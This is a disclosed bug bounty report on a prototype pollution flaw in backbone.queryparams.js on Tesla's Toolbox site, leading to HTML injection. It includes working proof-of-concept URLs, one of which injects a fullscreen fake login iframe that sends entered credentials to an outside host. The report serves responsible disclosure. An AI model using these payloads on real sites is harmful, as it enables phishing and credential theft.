[toolbox.teslamotors.com] HTML Injection via Prototype Pollution / Potential XSS

Disclosed by
BlackFan
  • Program Tesla
  • Disclosed date over 3 years ago
  • Reward $200
  • Priority P4 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by BlackFan

Toolbox website uses the backbone.queryparams.js script which is vulnerable to Prototype Pollution.
Using the existing js code, it is possible to add arbitrary HTML to the page (but inline js is blocked by the CSP).

Report details
  • Submitted

  • Target Location

    *.teslamotors.com
  • Target category

    Web App

  • VRT

    Server-Side Injection > Content Spoofing > iframe Injection
  • Priority

    P4
  • Bug URL
    https://toolbox.teslamotors.com/
  • Description

    Toolbox website uses the backbone.queryparams.js script which is vulnerable to Prototype Pollution.

    For example:

    • Open URL https://toolbox.teslamotors.com/?__proto__.VULN=PROTOTYPE_POLLUTION
    • Check in the console that Object.prototype.VULN was created Screenshot at 15-16-00.png

    Using this, an attacker can change the logic of scripts that are executed next. For example, make HTML Injection (in fact, this is XSS, but the site has a strict Content-Security-Policy).

    HTML Injection PoC:

    https://toolbox.teslamotors.com/?__proto__.id=1&__proto__.id=1&__proto__.username=1&__proto__.username=1&&__proto__.display_name=%3Cmarquee%3E&__proto__.display_name=1
    

    PoC with Fake Login page via fullscreen iframe:

    https://toolbox.teslamotors.com/?__proto__.id=1&__proto__.id=1&__proto__.username=1&__proto__.username=1&__proto__.display_name=%3Ciframe/srcdoc=%27%3Chtml%20lang=%22en%22%3E%3Chead%3E%3Cbase%20href=%22https://toolbox.teslamotors.com/%22/%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/jquery-ui.min.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/dataTables.bootstrap.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/dataTables.tableTools.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/dataTables.scroller.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap-dialog.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap-select.min.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/bootstrap-editable.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/font-awesome.css%22%3E%3Clink%20rel=%22stylesheet%22href=%22/assets/css/tbxweb.css%22%3E%3C/head%3E%3Cbody%3E%3Cdiv%20id=%22body%22%3E%3Cdiv%20id=%22banner-layout%22%3E%3C/div%3E%3Cdiv%20id=%22main-menu%22%3E%3Cnav%20class=%22navbar%20navbar-default%20navbar-static-top%22role=%22navigation%22style=%22margin-bottom:0px%22%3E%3Cdiv%20class=%22container%22%3E%3Cdiv%20class=%22navbar-header%22%3E%3Cbutton%20type=%22button%22class=%22navbar-toggle%20collapsed%22data-toggle=%22collapse%22data-target=%22%23navbar%22aria-expanded=%22false%22aria-controls=%22navbar%22%3E%3Cspan%20class=%22sr-only%22%3EToggle%20navigation%3C/span%3E%3Cspan%20class=%22icon-bar%22%3E%3C/span%3E%3Cspan%20class=%22icon-bar%22%3E%3C/span%3E%3Cspan%20class=%22icon-bar%22%3E%3C/span%3E%3C/button%3E%3Ca%20class=%22navbar-brand%22href=%22/%22style=%22padding-top:%200px;%20padding-left:%205px%22%3E%3Cimg%20style=%22height:75px%22alt=%22Brand%22src=%22/assets/images/tesla_flag.png%22%3E%3C/a%3E%3Ca%20class=%22navbar-brand%22style=%22font-size:%2023px%22href=%22/%22%3EToolbox%3C/a%3E%3C/div%3E%3Cdiv%20id=%22navbar%22class=%22navbar-collapse%20collapse%22%3E%3Cul%20class=%22nav%20navbar-nav%22%3E%3Cli%20class=%22dropdown%22%3E%3Ca%20href=%22/software/download%22class=%22dropdown-toggle%22role=%22button%22aria-expanded=%22false%22%3ESoftware%20%3Cspan%20class=%22caret%22%3E%3C/span%3E%3C/a%3E%3Cul%20class=%22dropdown-menu%22role=%22menu%22%3E%3Cli%3E%3Ca%20href=%22/software/download%22%3EDownload%3C/a%3E%3C/li%3E%3C/ul%3E%3C/li%3E%3C/ul%3E%3Cdiv%20id=%22search-form%22class=%22navbar-form%20navbar-left%22%3E%3C/div%3E%3Cdiv%20id=%22user-nav%22class=%22nav%20navbar-nav%20navbar-right%22%3E%3Cdiv%3E%3Cul%20class=%22nav%20navbar-nav%20navbar-right%22%3E%3Cli%3E%3Cspan%20class=%22glyphicon%20glyphicon-user%22aria-hidden=%22true%22%3E%3C/span%3E%20Login%20/%20Register%3C/a%3E%3C/li%3E%3C/ul%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/nav%3E%3C/div%3E%3Cdiv%20id=%22contents%22%3E%3Cdiv%3E%3Cdiv%20id=%22content%22class=%22container%22%3E%3Cform%20target=_parent%20action=//blackfan.ru/fk%20class=%22form-signin%22role=%22form%22%3E%3Ch2%20class=%22form-signin-heading%22%3E%3Cfont%20color=%22red%22%3E%3Cb%3EFAKE%3C/b%3E%3C/font%3E%20Toolbox%20Online%20Portal%20(External%20Site)%3C/h2%3E%3Cp%20id=%22error-text%22class=%22help-block%22%3E%3C/p%3E%3Cdiv%20class=%22form-group%22%3E%3Cinput%20id=%22username%22name=%22login%22class=%22form-control%20login-control%22placeholder=%22username%22autofocus=%22%22%3E%3Cinput%20id=%22password%22name=%22password%22type=%22password%22class=%22form-control%20login-control%22placeholder=%22password%22%3E%3C/div%3E%3Cdiv%20id=%22captcha-container%22%3E%3C/div%3E%3Cbutton%20id=%22login-btnx%22type=%22submit%22class=%22btn%20btn-default%20btn-block%22%3ESign%20in%3C/button%3E%3C/form%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/body%3E%3C/html%3E%27/style=%22position:fixed;top:0;left:0;bottom:0;right:0;width:100%25;height:100%25;border:none;margin:0;padding:0;overflow:hidden;z-index:999999;%22%3E%3C/iframe%3E&__proto__.display_name=1
    
    

    Screenshot at 15-19-50.png

Activity